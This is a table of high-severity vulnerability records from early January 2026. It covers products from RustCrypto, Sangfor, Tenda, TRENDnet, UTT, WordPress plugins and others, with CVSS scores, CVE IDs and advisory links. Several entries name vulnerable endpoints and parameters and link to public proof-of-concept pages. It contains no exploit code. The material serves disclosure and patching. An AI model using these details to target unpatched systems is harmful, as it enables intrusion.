| RustCrypto--elliptic-curves | RustCrypto: Elliptic Curves is general purpose Elliptic Curve Cryptography (ECC) support, including types and traits for representing various elliptic curve forms, scalars, points, and public/secret keys composed thereof. In versions 0.14.0-pre.0 and 0.14.0-rc.0, a denial-of-service vulnerability exists in the SM2 public-key encryption (PKE) implementation: the decrypt() path performs unchecked slice::split_at operations on input buffers derived from untrusted ciphertext. An attacker can submit short/undersized ciphertext or carefully-crafted DER-encoded structures to trigger bounds-check panics (Rust unwinding) which crash the calling thread or process. This issue has been patched via commit e60e991. | 2026-01-10 | 7.5 | CVE-2026-22700 | https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-j9xq-69pf-pcm8 https://github.com/RustCrypto/elliptic-curves/pull/1603 https://github.com/RustCrypto/elliptic-curves/commit/e60e99167a9a2b187ebe80c994c5204b0fdaf4ab |
| SaasProject--Booking Package | Improper Validation of Specified Quantity in Input vulnerability in SaasProject Booking Package allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Booking Package: from n/a through 1.6.27. | 2026-01-05 | 7.5 | CVE-2024-30516 | https://vdp.patchstack.com/database/wordpress/plugin/booking-package/vulnerability/wordpress-booking-package-plugin-1-6-27-price-manipulation-vulnerability?_s_id=cve |
| salvo-rs--salvo | Salvo is a Rust web backend framework. Prior to version 0.88.1, the function list_html generates a file view of a folder that includes a render of the current path, which is inserted into the HTML without proper sanitization. This leads to reflected XSS, because the request path is decoded and normalized in the matching stage but is inserted raw into the HTML view (current.path). The only constraint is that the root path (e.g. /files in the PoC example) must have a sub directory (e.g. common ones such as styles/scripts/etc) so that the matching returns the list HTML page instead of the Not Found page. This issue has been patched in version 0.88.1. | 2026-01-08 | 8.8 | CVE-2026-22256 | https://github.com/salvo-rs/salvo/security/advisories/GHSA-rjf8-2wcw-f6mp https://github.com/salvo-rs/salvo/blob/16efeba312a274739606ce76366d921768628654/crates/serve-static/src/dir.rs#L593 |
| salvo-rs--salvo | Salvo is a Rust web backend framework. Prior to version 0.88.1, the function list_html generates a file view of a folder without sanitizing the file or folder names. This may lead to XSS in cases where a website allows access to public files using this feature and anyone can upload a file. This issue has been patched in version 0.88.1. | 2026-01-08 | 8.8 | CVE-2026-22257 | https://github.com/salvo-rs/salvo/security/advisories/GHSA-54m3-5fxr-2f3j https://github.com/salvo-rs/salvo/blob/16efeba312a274739606ce76366d921768628654/crates/serve-static/src/dir.rs#L581 |
| Sangfor--Operation and Maintenance Management System | A vulnerability was found in Sangfor Operation and Maintenance Management System up to 3.0.8. This issue affects some unknown processing of the file /isomp-protocol/protocol/getHis of the component HTTP POST Request Handler. Manipulation of the argument sessionPath results in OS command injection. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 9.8 | CVE-2025-15500 | VDB-340345 \| Sangfor Operation and Maintenance Management System HTTP POST Request getHis os command injection VDB-340345 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #727208 \| Sangfor Operation and Maintenance Management System (OSM / 运维安全管理系统) 3.0.8 OS Command Injection https://github.com/master-abc/cve/issues/11 https://github.com/master-abc/cve/issues/11#issue-3770602189 |
| Sangfor--Operation and Maintenance Management System | A vulnerability was determined in Sangfor Operation and Maintenance Management System up to 3.0.8. The function WriterHandle.getCmd of the file /isomp-protocol/protocol/getCmd is impacted. Manipulation of the argument sessionPath causes OS command injection. Remote exploitation is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 9.8 | CVE-2025-15501 | VDB-340346 \| Sangfor Operation and Maintenance Management System getCmd WriterHandle.getCmd os command injection VDB-340346 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #727214 \| Sangfor Operation and Maintenance Management System (OSM / 运维安全管理系统) 3.0.8 OS Command Injection https://github.com/master-abc/cve/issues/12 https://github.com/master-abc/cve/issues/12#issue-3770615262 |
| Sangfor--Operation and Maintenance Management System | A vulnerability has been found in Sangfor Operation and Maintenance Management System up to 3.0.8. This vulnerability affects the function uploadCN of the file VersionController.java. Manipulation of the argument filename leads to OS command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 8.8 | CVE-2025-15499 | VDB-340344 \| Sangfor Operation and Maintenance Management System VersionController.java uploadCN os command injection VDB-340344 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #727207 \| Sangfor Operation and Maintenance Management System (运维安全管理系统 / OSM) 3.0.8 Command Injection https://github.com/master-abc/cve/issues/10 https://github.com/master-abc/cve/issues/10#issue-3770540830 |
| Sangfor--Operation and Maintenance Management System | A vulnerability was identified in Sangfor Operation and Maintenance Management System up to 3.0.8. The affected element is the function SessionController of the file /isomp-protocol/protocol/session. Manipulation of the argument Hostname leads to OS command injection. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-10 | 7.3 | CVE-2025-15502 | VDB-340347 \| Sangfor Operation and Maintenance Management System session SessionController os command injection VDB-340347 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #727217 \| Sangfor Operation and Maintenance Management System (OSM / 运维安全管理系统) 3.0.8 OS Command Injection https://github.com/master-abc/cve/issues/14 https://github.com/master-abc/cve/issues/14#issue-3770634476 |
| Sangfor--Operation and Maintenance Management System | A security flaw has been discovered in Sangfor Operation and Maintenance Management System up to 3.0.8. The impacted element is an unknown function of the file /fort/trust/version/common/common.jsp. Manipulation of the argument File results in unrestricted upload. The attack can be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-10 | 7.3 | CVE-2025-15503 | VDB-340348 \| Sangfor Operation and Maintenance Management System common.jsp unrestricted upload VDB-340348 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #727253 \| Sangfor Operation and Maintenance Management System (OSM / 运维安全管理系统) 3.0.8 Unrestricted Upload https://github.com/master-abc/cve/issues/13 https://github.com/master-abc/cve/issues/13#issue-3770623333 |
| Sfwebservice--InWave Jobs | Missing Authorization vulnerability in Sfwebservice InWave Jobs allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects InWave Jobs: from n/a through 3.5.8. | 2026-01-06 | 9.8 | CVE-2025-39477 | https://patchstack.com/database/wordpress/plugin/iwjob/vulnerability/wordpress-inwave-jobs-plugin-3-5-8-broken-access-control-vulnerability?_s_id=cve |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.28.25. This is due to insufficient validation of user-supplied role values in the 'validate_value', 'pre_update_value', and 'get_fields_display' functions. This makes it possible for unauthenticated attackers to register as administrators and gain complete control of the site, granted they can access a user registration form containing a Role field. | 2026-01-09 | 9.8 | CVE-2025-14736 | https://www.wordfence.com/threat-intel/vulnerabilities/id/07eb71fc-6588-490d-8947-3077ec4a9045?source=cve https://plugins.trac.wordpress.org/changeset/3427243/acf-frontend-form-element/trunk/main/frontend/fields/user/class-role.php |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Missing Authorization, leading to unauthorized data modification and deletion, due to a missing capability check on the 'delete_object' function in all versions up to, and including, 3.28.25. This makes it possible for unauthenticated attackers to delete arbitrary posts, pages, products, taxonomy terms, and user accounts. | 2026-01-09 | 9.1 | CVE-2025-14741 | https://www.wordfence.com/threat-intel/vulnerabilities/id/53adbab6-953a-4a6f-bbfc-89efdbdd28e0?source=cve https://plugins.trac.wordpress.org/browser/acf-frontend-form-element/tags/3.28.26/main/frontend/fields/general/class-delete-object.php?marks=106,119,132,142#L106 |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'acff' parameter in the 'frontend_admin/forms/update_field' AJAX action in all versions up to, and including, 3.28.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 7.2 | CVE-2025-14937 | https://www.wordfence.com/threat-intel/vulnerabilities/id/46c988ff-9cc5-4f2b-a3dd-06eaef5a7919?source=cve https://plugins.trac.wordpress.org/changeset/3427236/acf-frontend-form-element |
| Shazdeh--Header Image Slider | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Shazdeh Header Image Slider header-image-slider allows DOM-Based XSS. This issue affects Header Image Slider: from n/a through 0.3. | 2026-01-06 | 7.1 | CVE-2024-30547 | https://patchstack.com/database/wordpress/plugin/header-image-slider/vulnerability/wordpress-header-image-slider-plugin-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Shenzhen Xingmeng Qihang Media Co., Ltd.--QiHang Media Web (QH.aspx) Digital Signage | QiHang Media Web Digital Signage 3.0.9 contains a sensitive information disclosure vulnerability that allows remote attackers to intercept user authentication credentials through cleartext cookie transmission. Attackers can perform man-in-the-middle attacks to capture and potentially misuse stored authentication credentials transmitted in an insecure manner. | 2026-01-06 | 7.5 | CVE-2020-36914 | Zero Science Lab Disclosure (ZSL-2020-5578) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database Entry HowFor Vendor Homepage VulnCheck Advisory: QiHang Media Web Digital Signage 3.0.9 Cookie Authentication Credentials Disclosure |
| solwininfotech--User Activity Log | The User Activity Log plugin is vulnerable to a limited options update in versions up to, and including, 2.2. The failed-login handler 'ual_shook_wp_login_failed' lacks a capability check and writes failed usernames directly into update_option() calls. This makes it possible for unauthenticated attackers to push select site options from 0 to a non-zero value, allowing them to reopen registration or corrupt options like 'wp_user_roles', breaking wp-admin access. | 2026-01-07 | 7.5 | CVE-2025-11877 | https://www.wordfence.com/threat-intel/vulnerabilities/id/24225f47-cec2-4270-88f0-8696ebfb7168?source=cve https://plugins.trac.wordpress.org/browser/user-activity-log/trunk/user-functions.php |
| Sony Electronics Inc.--Sony BRAVIA Digital Signage | Sony BRAVIA Digital Signage 1.7.8 contains an insecure direct object reference vulnerability that allows attackers to bypass authorization controls. Attackers can access hidden system resources like '/#/content-creation' by manipulating client-side access restrictions. | 2026-01-06 | 9.8 | CVE-2020-36923 | Zero Science Lab Disclosure (ZSL-2020-5611) IBM X-Force Exchange Vulnerability Entry CXSecurity Vulnerability Listing Packet Storm Security Exploit Archive Sony Professional Display Software Product Page BRAVIA Signage Software Resources Sony BRAVIA Digital Signage Official Homepage VulnCheck Advisory: Sony BRAVIA Digital Signage 1.7.8 Client-Side Protection Bypass via IDOR |
| spinnaker--spinnaker | Spinnaker is an open source, multi-cloud continuous delivery platform. Versions prior to 2025.1.6, 2025.2.3, and 2025.3.0 are vulnerable to server-side request forgery. The primary impact is allowing users to fetch data from a remote URL. This data can then be injected into Spinnaker pipelines via Helm or other methods to extract things like IMDSv1 authentication data. This also includes calling internal Spinnaker APIs via GET and similar endpoints. Further, depending upon the artifact in question, auth data may be exposed to arbitrary endpoints (e.g. GitHub auth headers), leading to credential exposure. To trigger this, a Spinnaker installation must have two things. The first is an enabled artifact provider that allows user input. This includes GitHub file artifacts, BitBucket, GitLab, HTTP artifacts and similar artifact providers. Just enabling the HTTP artifact provider will add a "no-auth" HTTP provider that could be used to extract link-local data (e.g. AWS metadata information). The second is a system that can consume the output of these artifacts: e.g. Rosco Helm can use this to fetch values data, and Kubernetes account manifests can be used to inject that data into the pipeline itself if the API returns JSON, though the pipeline would fail. This vulnerability is fixed in versions 2025.1.6, 2025.2.3, and 2025.3.0. As a workaround, disable HTTP account types that allow user input of a given URL; this is probably not feasible in most cases. Git, Docker and other artifact account types with explicit URL configurations bypass this limitation and should be safe, as they limit artifact URL loading. Alternatively, use one of the various vendors which provide OPA policies to restrict pipelines from accessing or saving a pipeline with invalid URLs. | 2026-01-05 | 7.9 | CVE-2025-61916 | https://github.com/spinnaker/spinnaker/security/advisories/GHSA-vrjc-q2fh-6x9h |
| spree--spree | Spree is an open source e-commerce solution built with Ruby on Rails. Prior to versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5, an Unauthenticated Insecure Direct Object Reference (IDOR) vulnerability was identified that allows an unauthenticated attacker to access guest address information without supplying valid credentials or session cookies. This issue has been patched in versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5. | 2026-01-10 | 7.5 | CVE-2026-22589 | https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr https://github.com/spree/spree/commit/16067def6de8e0742d55313e83b0fbab6d2fd795 https://github.com/spree/spree/commit/4c2bd62326fba0d846fd9e4bad2c62433829b3ad https://github.com/spree/spree/commit/d051925778f24436b62fa8e4a6b842c72ca80a67 https://github.com/spree/spree/commit/e1cff4605eb15472904602aebaf8f2d04852d6ad |
| staniel359--muffon | muffon is a cross-platform music streaming client for desktop. Versions prior to 2.3.0 have a one-click Remote Code Execution (RCE) vulnerability. An attacker can exploit this issue by embedding a specially crafted `muffon://` link on any website they control. When a victim visits the site or clicks the link, the browser triggers Muffon's custom URL handler, causing the application to launch and process the URL. This leads to RCE on the victim's machine without further interaction. Version 2.3.0 patches the issue. | 2026-01-05 | 8.8 | CVE-2025-55204 | https://github.com/staniel359/muffon/security/advisories/GHSA-gc3f-gqph-522q https://drive.google.com/file/d/1eCPCQ6leuVM_vecfofFv04c0t9isCBqR/view?usp=sharing https://github.com/staniel359/muffon/releases/tag/v2.3.0 |
| SUSE--harvester | Projects using the SUSE Virtualization (Harvester) environment may expose the OS default ssh login password if they are using the 1.5.x or 1.6.x interactive installer to either create a new cluster or add new hosts to an existing cluster. The environment is not affected if the PXE boot mechanism is utilized along with the Harvester configuration setup. | 2026-01-08 | 9.8 | CVE-2025-62877 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-62877 https://github.com/harvester/harvester/security/advisories/GHSA-6g8q-hp2j-gvwv |
| SUSE--neuvector | NeuVector supports login authentication through OpenID Connect. However, the TLS verification (which verifies the remote server's authenticity and integrity) for OpenID Connect is not enforced by default. As a result this may expose the system to man-in-the-middle (MITM) attacks. | 2026-01-08 | 8.8 | CVE-2025-66001 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-66001 https://github.com/neuvector/neuvector/security/advisories/GHSA-4jj9-cgqc-x9h5 |
| Tdmsignage--TDM Digital Signage PC Player | TDM Digital Signage PC Player 4.1.0.4 contains an elevation of privileges vulnerability that allows authenticated users to modify executable files. Attackers can leverage the 'Modify' permissions for authenticated users to replace executable files with malicious binaries and gain elevated system access. | 2026-01-06 | 8.8 | CVE-2020-36916 | ExploitDB-48953 TDM Digital Signage Official Website Sony Professional Display Software Product Page Zero Science Lab Disclosure (ZSL-2020-5604) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange VulnCheck Advisory: TDM Digital Signage PC Player 4.1.0.4 Privilege Escalation via Insecure Permissions |
| Tencent--WeKnora | WeKnora is an LLM-powered framework designed for deep document understanding and semantic retrieval. Prior to version 0.2.5, there is a command injection vulnerability that allows authenticated users to inject stdio_config.command/args into MCP stdio settings, causing the server to execute subprocesses using these injected values. This issue has been patched in version 0.2.5. | 2026-01-10 | 10 | CVE-2026-22688 | https://github.com/Tencent/WeKnora/security/advisories/GHSA-78h3-63c4-5fqc https://github.com/Tencent/WeKnora/commit/f7900a5e9a18c99d25cec9589ead9e4e59ce04bb |
| Tencent--WeKnora | WeKnora is an LLM-powered framework designed for deep document understanding and semantic retrieval. Prior to version 0.2.5, after WeKnora enables the Agent service, it allows users to call the database query tool. Due to insufficient backend validation, an attacker can use prompt-based bypass techniques to evade query restrictions and obtain sensitive information from the target server and database. This issue has been patched in version 0.2.5. | 2026-01-10 | 8.1 | CVE-2026-22687 | https://github.com/Tencent/WeKnora/security/advisories/GHSA-pcwc-3fw3-8cqv https://github.com/Tencent/WeKnora/commit/da55707022c252dd2c20f8e18145b2d899ee06a1 |
| Tenda--AC23 | A weakness has been identified in Tenda AC23 16.03.07.52. This affects the function sscanf of the file /goform/PowerSaveSet. Manipulation of the argument Time can lead to a buffer overflow. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-01-06 | 8.8 | CVE-2026-0640 | VDB-339683 \| Tenda AC23 PowerSaveSet sscanf buffer overflow VDB-339683 \| CTI Indicators (IOB, IOC, IOA) Submit #731772 \| Tenda AC23 V16.03.07.52 Buffer Overflow https://github.com/xyh4ck/iot_poc/blob/main/Tenda%20AC23_Buffer_Overflow/Tenda%20AC23_Buffer_Overflow.md https://github.com/xyh4ck/iot_poc/blob/main/Tenda%20AC23_Buffer_Overflow/Tenda%20AC23_Buffer_Overflow.md#poc https://www.tenda.com.cn/ |
| the-hideout--tarkov-data-manager | The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to 02 January 2025, an authentication bypass vulnerability in the login endpoint allows any unauthenticated user to gain full admin access to the Tarkov Data Manager admin panel by exploiting a JavaScript prototype property access vulnerability, combined with loose equality type coercion. A series of fix commits on 02 January 2025 fixed this and other vulnerabilities. | 2026-01-07 | 9.8 | CVE-2026-21854 | https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-r8w6-9xwg-6h73 https://github.com/the-hideout/tarkov-data-manager/commit/f188f0abf766cefe3f1b7b4fc6fe9dad3736174a |
| the-hideout--tarkov-data-manager | The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to 02 January 2025, a reflected Cross Site Scripting (XSS) vulnerability in the toast notification system allows any attacker to execute arbitrary JavaScript in the context of a victim's browser session by crafting a malicious URL. A series of fix commits on 02 January 2025 fixed this and other vulnerabilities. | 2026-01-07 | 9.3 | CVE-2026-21855 | https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-9c23-rrg9-jc89 |
| the-hideout--tarkov-data-manager | The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8, a time-based blind SQL injection vulnerability in the webhook edit and scanner API endpoints allows an authenticated attacker to execute arbitrary SQL queries against the MySQL database. Commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8 contains a patch. | 2026-01-07 | 7.2 | CVE-2026-21856 | https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-4gcx-ghwc-rc78 https://github.com/the-hideout/tarkov-data-manager/commit/9bdb3a75a98a7047b6d70144eb1da1655d6992a8 |
| ThemeREX Group--Hope | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Group Hope charity-is-hope allows PHP Local File Inclusion. This issue affects Hope: from n/a through 3.0.0. | 2026-01-07 | 8.1 | CVE-2025-69081 | https://patchstack.com/database/wordpress/theme/charity-is-hope/vulnerability/wordpress-hope-theme-3-0-0-local-file-inclusion-vulnerability?_s_id=cve |
| Themesgrove--WidgetKit Pro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themesgrove WidgetKit Pro allows Reflected XSS. This issue affects WidgetKit Pro: from n/a through 1.13.1. | 2026-01-07 | 7.1 | CVE-2025-46494 | https://patchstack.com/database/wordpress/plugin/widgetkit-pro/vulnerability/wordpress-widgetkit-pro-plugin-1-13-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Themify--Shopo | Unrestricted Upload of File with Dangerous Type vulnerability in Themify Shopo allows Upload a Web Shell to a Web Server. This issue affects Shopo: from n/a through 1.1.4. | 2026-01-05 | 9.9 | CVE-2025-31048 | https://vdp.patchstack.com/database/wordpress/theme/shopo/vulnerability/wordpress-shopo-1-1-4-arbitrary-file-upload-vulnerability?_s_id=cve |
| Themify--Themify Edmin | Deserialization of Untrusted Data vulnerability in Themify Themify Edmin allows Object Injection. This issue affects Themify Edmin: from n/a through 2.0.0. | 2026-01-05 | 8.8 | CVE-2025-31047 | https://vdp.patchstack.com/database/wordpress/theme/edmin/vulnerability/wordpress-themify-edmin-2-0-0-php-object-injection-vulnerability?_s_id=cve |
| Themify--Themify Sidepane WordPress Theme | Unrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Sidepane WordPress Theme, Themify Themify Newsy, Themify Themify Folo, Themify Themify Edmin, Themify Bloggie, Themify Photobox, Themify Wigi, Themify Rezo, Themify Slide allows Upload a Web Shell to a Web Server. This issue affects Themify Sidepane WordPress Theme: from n/a through 1.9.8; Themify Newsy: from n/a through 1.9.9; Themify Folo: from n/a through 1.9.6; Themify Edmin: from n/a through 2.0.0; Bloggie: from n/a through 2.0.8; Photobox: from n/a through 2.0.1; Wigi: from n/a through 2.0.1; Rezo: from n/a through 1.9.7; Slide: from n/a through 1.7.5. | 2026-01-06 | 9.9 | CVE-2025-30996 | https://patchstack.com/database/wordpress/theme/sidepane/vulnerability/wordpress-themify-sidepane-wordpress-theme-1-9-8-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/newsy/vulnerability/wordpress-themify-newsy-1-9-9-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/folo/vulnerability/wordpress-themify-folo-1-9-6-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/edmin/vulnerability/wordpress-themify-edmin-2-0-0-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/bloggie/vulnerability/wordpress-bloggie-2-0-8-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/photobox/vulnerability/wordpress-photobox-2-0-1-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/wigi/vulnerability/wordpress-wigi-2-0-1-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/rezo/vulnerability/wordpress-rezo-1-9-7-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/slide/vulnerability/wordpress-slide-1-7-5-arbitrary-file-upload-vulnerability?_s_id=cve |
| Trend Micro, Inc.--Trend Micro Apex Central | A LoadLibraryEX vulnerability in Trend Micro Apex Central could allow an unauthenticated remote attacker to load an attacker-controlled DLL into a key executable, leading to execution of attacker-supplied code under the context of SYSTEM on affected installations. | 2026-01-08 | 9.8 | CVE-2025-69258 | https://success.trendmicro.com/en-US/solution/KA-0022071 https://success.trendmicro.com/ja-JP/solution/KA-0022081 https://www.tenable.com/security/research/tra-2026-01 |
| Trend Micro, Inc.--Trend Micro Apex Central | A message unchecked NULL return value vulnerability in Trend Micro Apex Central could allow a remote attacker to create a denial-of-service condition on affected installations. Please note: authentication is not required in order to exploit this vulnerability. | 2026-01-08 | 7.5 | CVE-2025-69259 | https://success.trendmicro.com/en-US/solution/KA-0022071 https://success.trendmicro.com/ja-JP/solution/KA-0022081 https://www.tenable.com/security/research/tra-2026-01 |
| Trend Micro, Inc.--Trend Micro Apex Central | A message out-of-bounds read vulnerability in Trend Micro Apex Central could allow a remote attacker to create a denial-of-service condition on affected installations. Please note: authentication is not required in order to exploit this vulnerability. | 2026-01-08 | 7.5 | CVE-2025-69260 | https://success.trendmicro.com/en-US/solution/KA-0022071 https://success.trendmicro.com/ja-JP/solution/KA-0022081 https://www.tenable.com/security/research/tra-2026-01 |
| TRENDnet--TEW-713RE | A vulnerability was detected in TRENDnet TEW-713RE 1.02. The impacted element is an unknown function of the file /goformX/formFSrvX. Manipulation of the argument SZCMD results in OS command injection. It is possible to launch the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-06 | 9.8 | CVE-2025-15471 | VDB-339721 \| TRENDnet TEW-713RE formFSrvX os command injection VDB-339721 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721441 \| TRENDnet TEW-713RE 1.02 OS Command Injection https://pentagonal-time-3a7.notion.site/Command-Injection-Vulnerability-in-formFSrvX-of-Trendnet-TEW-713RE-2d1e5dd4c5a5801481abe7a944763d39 |
| TRENDnet--TEW-811DRU | A flaw has been found in TRENDnet TEW-811DRU 1.0.2.0. This affects the function setDeviceURL of the file uapply.cgi of the component httpd. Manipulation of the argument DeviceURL causes OS command injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-06 | 7.2 | CVE-2025-15472 | VDB-339722 \| TRENDnet TEW-811DRU httpd uapply.cgi setDeviceURL os command injection VDB-339722 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721874 \| TRENDnet TEW-811DRU 1.0.4.0 OS Command Injection https://pentagonal-time-3a7.notion.site/TrendNet-TEW-811DRU-2d2e5dd4c5a58016a612e99853b835f8 |
| TryGhost--Ghost | Ghost is a Node.js content management system. In versions 5.105.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's 2FA mechanism allows staff users to skip email 2FA. This issue has been patched in versions 5.130.6 and 6.11.0. | 2026-01-10 | 8.1 | CVE-2026-22594 | https://github.com/TryGhost/Ghost/security/advisories/GHSA-5fp7-g646-ccf4 https://github.com/TryGhost/Ghost/commit/b59f707f670e6f175b669977724ccf16c718430b https://github.com/TryGhost/Ghost/commit/fc7bc2fb0888513498154ec5cb4b21eccb88de07 |
| TryGhost--Ghost | Ghost is a Node.js content management system. In versions 5.121.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's handling of Staff Token authentication allowed certain endpoints to be accessed that were only intended to be accessible via Staff Session authentication. External systems that have been authenticated via Staff Tokens for Admin/Owner-role users would have had access to these endpoints. This issue has been patched in versions 5.130.6 and 6.11.0. | 2026-01-10 | 8.1 | CVE-2026-22595 | https://github.com/TryGhost/Ghost/security/advisories/GHSA-9xg7-mwmp-xmjx https://github.com/TryGhost/Ghost/commit/9513d2a35c21067127ce8192443d8919ddcefcc8 https://github.com/TryGhost/Ghost/commit/c3017f81a5387b253a7b8c1ba1959d430ee536a3 |
| Tumult Inc--Tumult Hype Animations | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Tumult Inc Tumult Hype Animations allows DOM-Based XSS. This issue affects Tumult Hype Animations: from n/a through 1.9.11. | 2026-01-05 | 7.1 | CVE-2024-30461 | https://vdp.patchstack.com/database/wordpress/plugin/tumult-hype-animations/vulnerability/wordpress-tumult-hype-animations-plugin-1-9-11-csrf-to-xss-vulnerability?_s_id=cve |
| Ubiquiti Inc--UBB-XG | A malicious actor in Wi-Fi range of the affected product could leverage a vulnerability in the airMAX Wireless Protocol to achieve a remote code execution (RCE) within the affected product. Affected Products: UBB-XG (Version 1.2.2 and earlier) UDB-Pro/UDB-Pro-Sector (Version 1.4.1 and earlier) UBB (Version 3.1.5 and earlier) Mitigation: Update your UBB-XG to Version 1.2.3 or later. Update your UDB-Pro/UDB-Pro-Sector to Version 1.4.2 or later. Update your UBB to Version 3.1.7 or later. | 2026-01-08 | 8.8 | CVE-2026-21638 | https://community.ui.com/releases/Security-Advisory-Bulletin-060-060/cde18da7-2bc4-41bb-a9cc-48a4a4c479c1 |
| Ubiquiti Inc--UCRM Argentina AFIP invoices Plugin | A Cross-Site Scripting (XSS) vulnerability in the UCRM Argentina AFIP invoices Plugin (v1.2.0 and earlier) could allow privilege escalation if an Administrator is tricked into visiting a crafted malicious page. This plugin is disabled by default. Affected Products: UCRM Argentina AFIP invoices Plugin (Version 1.2.0 and earlier) Mitigation: Update UCRM Argentina AFIP invoices Plugin to Version 1.3.0 or later. | 2026-01-05 | 7.5 | CVE-2025-59467 | https://community.ui.com/releases/Security-Advisory-Bulletin-057/6d3f2a51-22b8-47a1-9296-1e9dcd64e073 |
| Ubiquiti Inc--UniFi Protect Application | A malicious actor with access to the adjacent network could obtain unauthorized access to a UniFi Protect Camera by exploiting a discovery protocol vulnerability in the Unifi Protect Application (Version 6.1.79 and earlier). Affected Products: UniFi Protect Application (Version 6.1.79 and earlier). Mitigation: Update your UniFi Protect Application to Version 6.2.72 or later. | 2026-01-05 | 8.8 | CVE-2026-21633 | https://community.ui.com/releases/Security-Advisory-Bulletin-058-058/6922ff20-8cd7-4724-8d8c-676458a2d0f9 |
| UTT-- 520W | A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. Affected by this issue is the function strcpy of the file /goform/formUser. Such manipulation of the argument passwd1 leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 8.8 | CVE-2025-15459 | VDB-339495 \| UTT 进取 520W formUser strcpy buffer overflow VDB-339495 \| CTI Indicators (IOB, IOC, IOA) Submit #725816 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/22.md https://github.com/cymiao1978/cve/blob/main/new/22.md#poc |
| UTT-- 520W | A vulnerability was detected in UTT 进取 520W 1.7.7-180627. This affects the function strcpy of the file /goform/formPptpClientConfig. Performing a manipulation of the argument EncryptionMode results in buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 8.8 | CVE-2025-15460 | VDB-339496 \| UTT 进取 520W formPptpClientConfig strcpy buffer overflow VDB-339496 \| CTI Indicators (IOB, IOC, IOA) Submit #725817 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/23.md https://github.com/cymiao1978/cve/blob/main/new/23.md#poc |
